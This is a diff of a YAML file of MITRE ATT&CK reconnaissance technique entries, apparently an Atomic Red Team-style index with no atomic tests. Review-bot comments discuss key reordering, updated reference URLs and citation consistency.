x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1595:
technique:
@@ -66864,7 +67558,7 @@ reconnaissance:
url: https://wiki.owasp.org/index.php/OAT-004_Fingerprinting
description: OWASP Wiki. (2018, February 16). OAT-004 Fingerprinting. Retrieved
October 20, 2020.
- modified: '2022-05-11T14:00:00.188Z'
+ modified: '2022-03-08T20:58:13.661Z'
name: Active Scanning
description: |-
Adversaries may execute active reconnaissance scans to gather information that can be used during targeting. Active scans are those where the adversary probes victim infrastructure via network traffic, as opposed to other forms of reconnaissance that do not involve direct interaction.
@@ -66885,8 +67579,6 @@ reconnaissance:
- 'Network Traffic: Network Traffic Flow'
- 'Network Traffic: Network Traffic Content'
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.002:
technique:
@@ -66951,7 +67643,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 2.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1598.004:
technique:
@@ -66999,7 +67690,6 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.1.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1590.006:
technique:
@@ -67021,7 +67711,7 @@ reconnaissance:
url: https://nmap.org/book/firewalls.html
description: Nmap. (n.d.). Chapter 10. Detecting and Subverting Firewalls
and Intrusion Detection Systems. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:31:54.275Z'
name: Network Security Appliances
description: |-
Adversaries may gather information about the victim's network security appliances that can be used during targeting. Information about network security appliances may include a variety of details, such as the existence and specifics of deployed firewalls, content filters, and proxies/bastion hosts. Adversaries may also target information about victim network-based intrusion detection systems (NIDS) or other appliances related to defensive cybersecurity operations.
@@ -67037,34 +67727,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
- type: attack-pattern
- created: '2020-10-02T16:50:12.809Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1593.002
- url: https://attack.mitre.org/techniques/T1593/002
- - source_name: SecurityTrails Google Hacking
- url: https://securitytrails.com/blog/google-hacking-techniques
- description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- - source_name: ExploitDB GoogleHacking
- url: https://www.exploit-db.com/google-hacking-database
- description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
- October 23, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-12T19:19:47.758Z'
name: Search Engines
description: |-
Adversaries may use search engines to collect information about victims that can be used during targeting. Search engine services typical crawl online sites to index context and may provide users with specialized syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
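Review bot: the 34-line removal here is a whole-object key reorder (platforms, domains, id, type, created and external_references all move to after x_mitre_version) rather than a content change; the only substantive edits to T1593.002 are the `modified` bump and the reference changes in the next hunk. If the generator can emit keys in a stable order (the order the previous version used, or sorted), diffs like this one become reviewable line by line instead of requiring a side-by-side comparison to confirm nothing was lost.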
@@ -67073,15 +67739,38 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--6e561441-8431-4773-a9b8-ccf28ef6a968
+ created: '2020-10-02T16:50:12.809Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1593/002
+ external_id: T1593.002
+ - source_name: SecurityTrails Google Hacking
+ description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
+ - source_name: ExploitDB GoogleHacking
+ description: Offensive Security. (n.d.). Google Hacking Database. Retrieved
+ October 23, 2020.
+ url: https://www.exploit-db.com/google-hacking-database
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591.002:
technique:
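Review bot: the `SecurityTrails Google Hacking` reference now points at https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks while its `source_name` and description ('Borges, E. (2019, March 5). Exploring Google Hacking Techniques.') still attribute it to SecurityTrails; the same substitution appears again in the T1593 hunk below. If this mirrors the upstream ATT&CK object it is fine to keep, and the description still cites `(Citation: SecurityTrails Google Hacking)` so the key must not be renamed, but a reviewer cannot tell from the diff whether the new URL is the same article relocated or a different one.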
@@ -67103,7 +67792,7 @@ reconnaissance:
url: https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/
description: Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records,
Personal Voicemail Transcripts. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:36:58.964Z'
name: Business Relationships
description: |-
Adversaries may gather information about the victim's business relationships that can be used during targeting. Information about an organization’s business relationships may include a variety of details, including second or third-party organizations/domains (ex: managed service providers, contractors, etc.) that have connected (and potentially elevated) network access. This information may also reveal supply chains and shipment paths for the victim’s hardware and software resources.
@@ -67119,8 +67808,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.003:
technique:
@@ -67181,29 +67868,10 @@ reconnaissance:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.0.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1589.003:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
- type: attack-pattern
- created: '2020-10-02T14:57:15.906Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1589.003
- url: https://attack.mitre.org/techniques/T1589/003
- - source_name: OPM Leak
- url: https://www.opm.gov/cybersecurity/cybersecurity-incidents/
- description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
- Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-09-16T16:09:45.795Z'
name: Employee Names
description: |-
Adversaries may gather employee names that can be used during targeting. Employee names be used to derive email addresses as well as to help guide other reconnaissance efforts and/or craft more-believable lures.
@@ -67212,15 +67880,34 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.0'
+ type: attack-pattern
+ id: attack-pattern--76551c52-b111-4884-bc47-ff3e728f0156
+ created: '2020-10-02T14:57:15.906Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1589/003
+ external_id: T1589.003
+ - source_name: OPM Leak
+ description: Cybersecurity Resource Center. (n.d.). CYBERSECURITY INCIDENTS.
+ Retrieved September 16, 2024.
+ url: https://web.archive.org/web/20230602111604/https://www.opm.gov/cybersecurity/cybersecurity-incidents/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.004:
technique:
@@ -67246,7 +67933,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:35:09.668Z'
name: Client Configurations
description: |-
Adversaries may gather information about the victim's client configurations that can be used during targeting. Information about client configurations may include a variety of details and settings, including operating system/version, virtualization, architecture (ex: 32 or 64 bit), language, and/or time zone.
@@ -67264,47 +67951,10 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1598.002:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Philip Winther
- - Sebastian Salla, McAfee
- - Robert Simmons, @MalwareUtkonos
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
- type: attack-pattern
- created: '2020-10-02T17:08:57.386Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1598.002
- url: https://attack.mitre.org/techniques/T1598/002
- - source_name: Sophos Attachment
- url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
- description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
- links – when phishers bring along their own web pages. Retrieved October
- 20, 2020.'
- - source_name: GitHub Phishery
- url: https://github.com/ryhanson/phishery
- description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
- 23, 2020.
- - source_name: Microsoft Anti Spoofing
- url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
- description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
- Retrieved October 19, 2020.
- - source_name: ACSC Email Spoofing
- url: https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
- description: Australian Cyber Security Centre. (2012, December). Mitigating
- Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-05-31T04:18:44.568Z'
name: Spearphishing Attachment
description: |-
Adversaries may send spearphishing messages with a malicious attachment to elicit sensitive information that can be used during targeting. Spearphishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Spearphishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages.
@@ -67313,19 +67963,55 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Philip Winther
+ - Sebastian Salla, McAfee
+ - Robert Simmons, @MalwareUtkonos
+ x_mitre_deprecated: false
x_mitre_detection: 'Monitor for suspicious email activity, such as numerous
accounts receiving messages from a single unusual/unknown sender. Filtering
based on DKIM+SPF or header analysis can help detect when the email sender
is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)'
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Network Traffic: Network Traffic Flow'
- 'Application Log: Application Log Content'
- 'Network Traffic: Network Traffic Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--8982a661-d84c-48c0-b4ec-1db29c6cf3bc
+ created: '2020-10-02T17:08:57.386Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1598/002
+ external_id: T1598.002
+ - source_name: ACSC Email Spoofing
+ description: Australian Cyber Security Centre. (2012, December). Mitigating
+ Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.
+ url: https://web.archive.org/web/20210708014107/https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf
+ - source_name: Sophos Attachment
+ description: 'Ducklin, P. (2020, October 2). Serious Security: Phishing without
+ links – when phishers bring along their own web pages. Retrieved October
+ 20, 2020.'
+ url: https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/
+ - source_name: Microsoft Anti Spoofing
+ description: Microsoft. (2020, October 13). Anti-spoofing protection in EOP.
+ Retrieved October 19, 2020.
+ url: https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide
+ - source_name: GitHub Phishery
+ description: Ryan Hanson. (2016, September 24). phishery. Retrieved October
+ 23, 2020.
+ url: https://github.com/ryhanson/phishery
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1596.004:
technique:
@@ -67348,7 +68034,7 @@ reconnaissance:
description: Swisscom & Digital Shadows. (2017, September 6). Content Delivery
Networks (CDNs) Can Leave You Exposed – How You Might Be Affected And What
You Can Do About It. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:47:55.905Z'
name: CDNs
description: |-
Adversaries may search content delivery network (CDN) data about victims that can be used during targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers. CDNs may also allow organizations to customize content delivery based on the requestor’s geographical region.
@@ -67364,8 +68050,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1591:
technique:
@@ -67391,7 +68075,7 @@ reconnaissance:
url: https://www.sec.gov/edgar/search-and-access
description: U.S. SEC. (n.d.). EDGAR - Search and Access. Retrieved August
27, 2021.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-08-27T15:37:09.343Z'
name: Gather Victim Org Information
description: |-
Adversaries may gather information about the victim's organization that can be used during targeting. Information about an organization may include a variety of details, including the names of divisions/departments, specifics of business operations, as well as the roles and responsibilities of key employees.
@@ -67407,8 +68091,6 @@ reconnaissance:
x_mitre_version: '1.1'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1590:
technique:
@@ -67436,7 +68118,7 @@ reconnaissance:
url: https://www.circl.lu/services/passive-dns/
description: CIRCL Computer Incident Response Center. (n.d.). Passive DNS.
Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:34:23.229Z'
name: Gather Victim Network Information
description: |-
Adversaries may gather information about the victim's networks that can be used during targeting. Information about networks may include a variety of details, including administrative data (ex: IP ranges, domain names, etc.) as well as specifics regarding its topology and operations.
@@ -67452,12 +68134,10 @@ reconnaissance:
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593:
technique:
- modified: '2022-10-18T22:48:33.286Z'
+ modified: '2024-09-12T19:19:47.759Z'
name: Search Open Websites/Domains
description: |-
Adversaries may search freely available websites and/or domains for information about victims that can be used during targeting. Information about victims may be available in various online sites, such as social media, new sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation: ExploitDB GoogleHacking)
@@ -67466,16 +68146,16 @@ reconnaissance:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_platforms:
- - PRE
- x_mitre_is_subtechnique: false
- x_mitre_deprecated: false
x_mitre_domains:
- enterprise-attack
+ x_mitre_is_subtechnique: false
+ x_mitre_platforms:
+ - PRE
x_mitre_version: '1.1'
type: attack-pattern
id: attack-pattern--a0e6614a-7740-4b24-bd65-f1bde09fc365
@@ -67488,8 +68168,8 @@ reconnaissance:
external_id: T1593
- source_name: SecurityTrails Google Hacking
description: Borges, E. (2019, March 5). Exploring Google Hacking Techniques.
- Retrieved October 20, 2020.
- url: https://securitytrails.com/blog/google-hacking-techniques
+ Retrieved September 12, 2024.
+ url: https://www.recordedfuture.com/threat-intelligence-101/threat-analysis-techniques/google-dorks
- source_name: Cyware Social Media
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
@@ -67500,52 +68180,50 @@ reconnaissance:
url: https://www.exploit-db.com/google-hacking-database
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1597:
technique:
- x_mitre_platforms:
- - PRE
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
- type: attack-pattern
- created: '2020-10-02T17:01:42.558Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1597
- url: https://attack.mitre.org/techniques/T1597
- - source_name: D3Secutrity CTI Feeds
- url: https://d3security.com/blog/10-of-the-best-open-source-threat-intelligence-feeds/
- description: Banerd, W. (2019, April 30). 10 of the Best Open Source Threat
- Intelligence Feeds. Retrieved October 20, 2020.
- - source_name: ZDNET Selling Data
- url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
- description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
- 73 million user records on the dark web. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-04T13:12:14.469Z'
name: Search Closed Sources
description: |-
- Adversaries may search and gather information about victims from closed sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
+ Adversaries may search and gather information about victims from closed (e.g., paid, private, or otherwise not freely available) sources that can be used during targeting. Information about victims may be available for purchase from reputable private sources and databases, such as paid subscriptions to feeds of technical/threat intelligence data. Adversaries may also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.(Citation: ZDNET Selling Data)
Adversaries may search in different closed databases depending on what information they seek to gather. Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)).
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: reconnaissance
+ x_mitre_contributors:
+ - Barbara Louis-Sidney (OWN-CERT)
+ x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.
- x_mitre_version: '1.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ x_mitre_platforms:
+ - PRE
+ x_mitre_version: '1.1'
+ type: attack-pattern
+ id: attack-pattern--a51eb150-93b1-484b-a503-e51453b127a4
+ created: '2020-10-02T17:01:42.558Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1597
+ external_id: T1597
+ - source_name: ZDNET Selling Data
+ description: Cimpanu, C. (2020, May 9). A hacker group is selling more than
+ 73 million user records on the dark web. Retrieved October 20, 2020.
+ url: https://www.zdnet.com/article/a-hacker-group-is-selling-more-than-73-million-user-records-on-the-dark-web/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
atomic_tests: []
T1592.003:
technique:
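Review bot: dropping `(Citation: D3Secutrity CTI Feeds)` from the description together with its `external_references` entry is consistent (no dangling citation key, and the misspelt key goes with it), and the `x_mitre_version` bump to '1.1' covers the text change; the first sentence about paid threat-intelligence feeds now carries no reference at all, which is acceptable only if that is exactly the upstream 1.1 text.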
@@ -67567,7 +68245,7 @@ reconnaissance:
url: https://arstechnica.com/information-technology/2020/08/intel-is-investigating-the-leak-of-20gb-of-its-source-code-and-private-data/
description: Goodin, D. & Salter, J. (2020, August 6). More than 20GB of Intel
source code and proprietary data dumped online. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:22:46.759Z'
name: Firmware
description: |-
Adversaries may gather information about the victim's host firmware that can be used during targeting. Information about host firmware may include a variety of details such as type and versions on specific hosts, which may be used to infer more information about hosts in the environment (ex: configuration, purpose, age/patch level, etc.).
@@ -67583,8 +68261,6 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1592.002:
technique:
@@ -67610,7 +68286,7 @@ reconnaissance:
url: https://threatconnect.com/blog/infrastructure-research-hunting/
description: 'ThreatConnect. (2020, December 15). Infrastructure Research
and Hunting: Boiling the Domain Ocean. Retrieved October 12, 2021.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-17T16:33:19.596Z'
name: Software
description: |-
Adversaries may gather information about the victim's host software that can be used during targeting. Information about installed software may include a variety of details such as types and versions on specific hosts, as well as the presence of additional components that might be indicative of added defensive protections (ex: antivirus, SIEMs, etc.).
@@ -67628,8 +68304,6 @@ reconnaissance:
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_data_sources:
- 'Internet Scan: Response Content'
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1593.001:
technique:
@@ -67651,7 +68325,7 @@ reconnaissance:
url: https://cyware.com/news/how-hackers-exploit-social-media-to-break-into-your-company-88e8da8e
description: Cyware Hacker News. (2019, October 2). How Hackers Exploit Social
Media To Break Into Your Company. Retrieved October 20, 2020.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-04-15T03:52:40.958Z'
name: Social Media
description: |-
Adversaries may search social media for information about victims that can be used during targeting. Social media sites may contain various information about a victim organization, such as business announcements as well as information about the roles, locations, and interests of staff.
@@ -67667,12 +68341,10 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_version: '1.0'
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
atomic_tests: []
T1589.001:
technique:
- modified: '2023-04-14T23:29:10.396Z'
+ modified: '2024-10-10T13:45:01.069Z'
name: Credentials
description: "Adversaries may gather credentials that can be used during targeting.
Account credentials gathered by adversaries may be those directly associated
@@ -67682,17 +68354,20 @@ reconnaissance:
elicitation via [Phishing for Information](https://attack.mitre.org/techniques/T1598).
Adversaries may also compromise sites then add malicious content designed
to collect website authentication cookies from visitors.(Citation: ATT ScanBox)
- Credential information may also be exposed to adversaries via leaks to online
- or other accessible data sets (ex: [Search Engines](https://attack.mitre.org/techniques/T1593/002),
- breach dumps, code repositories, etc.).(Citation: Register Deloitte)(Citation:
- Register Uber)(Citation: Detectify Slack Tokens)(Citation: Forbes GitHub Creds)(Citation:
- GitHub truffleHog)(Citation: GitHub Gitrob)(Citation: CNET Leaks) Adversaries
- may also purchase credentials from dark web or other black-markets. Finally,
- where multi-factor authentication (MFA) based on out-of-band communications
- is in use, adversaries may compromise a service provider to gain access to
- MFA codes and one-time passwords (OTP).(Citation: Okta Scatter Swine 2022)\n\nGathering
- this information may reveal opportunities for other forms of reconnaissance
- (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
+ (Citation: Register Deloitte)(Citation: Register Uber)(Citation: Detectify
+ Slack Tokens)(Citation: Forbes GitHub Creds)(Citation: GitHub truffleHog)(Citation:
+ GitHub Gitrob)(Citation: CNET Leaks) Where multi-factor authentication (MFA)
+ based on out-of-band communications is in use, adversaries may compromise
+ a service provider to gain access to MFA codes and one-time passwords (OTP).(Citation:
+ Okta Scatter Swine 2022)\n\nCredential information may also be exposed to
+ adversaries via leaks to online or other accessible data sets (ex: [Search
+ Engines](https://attack.mitre.org/techniques/T1593/002), breach dumps, code
+ repositories, etc.). Adversaries may purchase credentials from dark web markets,
+ such as Russian Market and 2easy, or through access to Telegram channels that
+ distribute logs from infostealer malware.(Citation: Bleeping Computer 2easy
+ 2021)(Citation: SecureWorks Infostealers 2023)(Citation: Bleeping Computer
+ Stealer Logs 2023)\n\nGathering this information may reveal opportunities
+ for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)
or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Compromise Accounts](https://attack.mitre.org/techniques/T1586)),
and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133)
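Review bot: the three citation keys introduced in the reordered description (`Bleeping Computer 2easy 2021`, `SecureWorks Infostealers 2023`, `Bleeping Computer Stealer Logs 2023`) each have a matching `external_references` entry added in the hunks below, and `x_mitre_version` goes to '1.2', so the change is internally consistent; one style point is that this description is emitted as a double-quoted scalar with literal `\n\n` escapes and hard wraps while every other description in the file uses a `|-` block scalar, which makes this hunk hard to read and will keep producing noisy reflow diffs on every upstream wording change.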
@@ -67704,6 +68379,7 @@ reconnaissance:
- Vinayak Wadhwa, Lucideus
- Lee Christensen, SpecterOps
- Toby Kohlenberg
+ - Massimo Giaimo, Würth Group Cyber Defence Center
x_mitre_deprecated: false
x_mitre_detection: |-
Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.
@@ -67714,7 +68390,7 @@ reconnaissance:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- PRE
- x_mitre_version: '1.1'
+ x_mitre_version: '1.2'
type: attack-pattern
id: attack-pattern--bc76d0a4-db11-4551-9ac4-01a469cfb161
created: '2020-10-02T14:55:43.815Z'
@@ -67724,6 +68400,10 @@ reconnaissance:
- source_name: mitre-attack
url: https://attack.mitre.org/techniques/T1589/001
external_id: T1589.001
